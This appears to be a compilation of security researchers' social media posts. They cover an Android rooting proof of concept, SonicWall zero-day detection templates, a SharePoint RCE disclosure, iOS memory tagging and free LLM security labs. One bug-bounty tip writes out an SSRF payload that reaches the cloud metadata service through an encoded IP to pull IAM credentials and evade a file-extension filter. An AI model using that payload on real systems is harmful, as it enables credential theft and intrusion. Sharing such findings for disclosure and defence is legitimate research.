@alysha_lobo@alysha_lobo This is exactly the kind of systems work I want to pursue. My OpenCRE work spans ETL, distributed sync, and resilient pipelines. I’ve applied through the provided application link and would love to be considered for an internship opportunity.
https://t.co/iiqIxMex6w
Quick POC using @nebusecurity CVE-2026-43499 to root my bootloader locked US S25 (SM-S931U1). Btw this works on latest fw. This phone is Android 16, June update.
https://t.co/uIIAzHwnB7
I have detailed notes on flashing, exploitation, offset finding etc, blog post later 🖖
#ssrf
extention bypass if it requires the file to end with .yaml
do it: url=http://2852039166/latest/meta-data/iam/security-credentials/target-web-role?a=example.yaml
paramter with bypass #bugbounty#bugbountytrics #
🚨 Two actively exploited zero-days affecting SonicWall SMA1000 appliances: CVE-2026-15409 (CVSS 10.0) and CVE-2026-15410 (CVSS 7.2)
I’ve created vulnerability detection templates here (with confidence levels):
CVE-2026-15409: https://t.co/b1gkez7oZr
CVE-2026-15410: https://t.co/ZXmaHx9Ua2
CVE-2026-15409 is remotely exploitable without authentication, while CVE-2026-15410 requires an authenticated administrator.
Platform hotfixes are available through SonicWall’s security advisory:
https://t.co/DRiTG27p9I
Earlier this year I built out an unauth RCE chain against SharePoint, we disclosed it to Microsoft in May and today they have patched out the chains auth bypass vuln, CVE-2026-55040. Disclosure details on the @rapid7 blog, full technical details to be published at a later date...
With Apple's Memory Integrity Enforcement turned on, a classic iOS memory bug can't fail silently anymore. Write 2,000 bytes into a 16-byte buffer and the app crashes the instant it goes out of bounds, no quiet corruption.
The blog shows how to switch it on in your own app and read the crash it produces: https://t.co/rgN2DULmjD
The honest limit: it catches 93.75% of these bugs, not 100%.
That remaining gap is where exploitation lives: heap overflows and use-after-frees under ARM64 tagged memory are core OS-level iOS work. Our Offensive Mobile Reversing and Exploitation course covers ARM64 binary exploitation and PAC/SPTM/RKP bypasses hands-on: https://t.co/BGduUr6sIY
Follow @8kSec for more iOS memory-protection research.
Want to learn AI / LLM Security Assessment? Don't have the money for a training?
Here are 🎯SEVENTY ONE🎯 FREE LLM security labs that we have curated for you!
Like and share! (Link Below)
<3 from @arcanuminfosec